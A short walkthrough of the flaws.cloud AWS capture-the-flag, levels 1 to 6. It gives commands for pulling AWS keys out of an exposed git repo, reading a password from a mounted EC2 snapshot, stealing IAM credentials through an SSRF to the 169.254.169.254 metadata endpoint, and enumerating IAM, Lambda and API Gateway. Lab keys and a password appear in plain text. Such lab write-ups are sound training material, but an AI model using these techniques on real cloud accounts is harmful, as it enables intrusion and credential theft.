flaws.cloud Cloud CTF walkthrough (minimal)

vict0ni

3 min read
flaws.cloud Cloud CTF walkthrough (minimal)

Level 1

  1. dig flaws.cloud
    - get one of the IPs
  2. nslookup [IP] or python3 isitonaws.py [IP] (script source here)
    - see it's an s3 in us-west-2 --> flaws.cloud.s3-website-us-west-2.amazonaws.com
  3. aws s3 ls s3://flaws.cloud
    - Result:
    2017-03-14 03:00:38       2575 hint1.html
    2017-03-03 04:05:17       1707 hint2.html
    2017-03-03 04:05:11       1101 hint3.html
    2020-05-22 18:16:45       3162 index.html
    2018-07-10 16:47:16      15979 logo.png
    2017-02-27 01:59:28         46 robots.txt
    2017-02-27 01:59:30       1051 secret-dd02c7c.html
  4. Visit http://flaws.cloud/secret-dd02c7c.html

Level 2

  1. Same as level1 but you must have an AWS account (authenticated user)

Level 3

  1. aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
    - exposed git repo
  2. aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ flaws-lvl3-git --recursive
  3. cd flaws-lvl3-git
  4. git log
    - Find commit hash b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  5. git show b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
    - access_key=AKIAJ366LIPB4IJKT7SA
    - secret_access_key=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
  6. AWS_ACCESS_KEY_ID=AKIAJ366LIPB4IJKT7SA AWS_SECRET_ACCESS_KEY=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 aws s3 ls
    - level4-1156739cfb264ced6de514971a4bef68.flaws.cloud

Level 4

  1. AWS_ACCESS_KEY_ID=AKIAJ366LIPB4IJKT7SA AWS_SECRET_ACCESS_KEY=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 aws ec2 describe-snapshots --owner-ids self
    - lists snapshots made from the account with the keys:
    - find snap-0b49342abd1bdcb89
  2. aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89
    - with your own profile
  3. ssh ubuntu@ec2-[us-west-2-ec2-IP].us-west-2.compute.amazonaws.com
  4. Mount volume /dev/xvdb1
    - sudo mount /dev/xvdb1 /mountpoint
  5. Find /home/ubuntu/setupNginx.sh
    - content: htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
  6. Login to http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud with flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Level 5

  1. Check http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
  2. Find your way to http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
  3. Take the keys and token and put it in ~/.aws/credentials with the profile name [level5]
  4. aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
  5. The secret directory is ddcc78ff/

Level 6

Enumeration

  1. AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 aws iam list-users
    - list users available in this account
    - users: backup and Level6
  2. AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 aws iam list-attached-user-policies --user-name Level6
    - see policies attached to  Level6
    - policies attached:
    - arn:aws:iam::975426262029:policy/MySecurityAudit
    - arn:aws:iam::975426262029:policy/list_apigateways
  3. AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 aws iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
    - find more about the custom policy list_apigateways
    - "DefaultVersionId": "v4"
  4. AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 aws iam get-policy-version --version-id v4 --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
    - get detailed information about the permissions in the policy
    - "Action": "apigateway:GET"
    - "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
    - we are allowed to do GET requests to rest apis
    - here the api gateway is calling a lambda function
  5. AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 aws --region us-west-2 lambda list-functions
    - find function Level6
  6. AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 aws --region us-west-2 lambda get-policy --function-name Level6
    - it's an api with arn arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6
    - this means:
    - http://[restapi-id].execute-api.[region].amazonaws.com/
    - in our case: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/
    - https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Level6 is Forbidden, need to find the stage that the function is in
  7. AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 aws --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
    - "stageName": "Prod"
    - i.e. https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
Mastodon